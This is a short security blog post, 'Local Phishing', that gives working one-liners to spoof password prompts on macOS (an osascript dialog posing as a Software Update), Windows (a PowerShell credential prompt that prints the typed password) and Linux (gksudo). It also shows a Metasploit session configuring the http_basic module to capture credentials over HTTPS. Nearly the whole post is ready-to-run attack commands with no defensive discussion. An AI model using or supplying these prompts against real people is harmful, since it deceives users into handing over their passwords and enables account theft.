MENU

Local Phishing

January 26, 2018 • Security

Mac OSX

osascript -e 'tell app "Terminal" to activate' -e 'tell app "Terminal" to activate' -e 'tell app "Terminal" to display dialog "Terminal requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'

Screen Shot 2018-01-17 at 2.19.52 PM.png

Script:https://github.com/fuzzynop/FiveOnceInYourLife

Windows

$creds = $host.ui.PromptForCredential("Login Required","Enter username and password.", "$env:username","NewBiosUserName"); write-host Username: $env:username    Password: $creds.GetNetworkCredential().password;

Screen Shot 2018-01-17 at 1.48.13 PM.png

Linux

gksudo -p -m "Enter password to continue."

Screen Shot 2018-01-17 at 1.48.38 PM.png

Metasploit

root@kali:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic 
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
Tags: Phishing
Archives QR Code
QR Code for this page
Tipping QR Code
Leave a Comment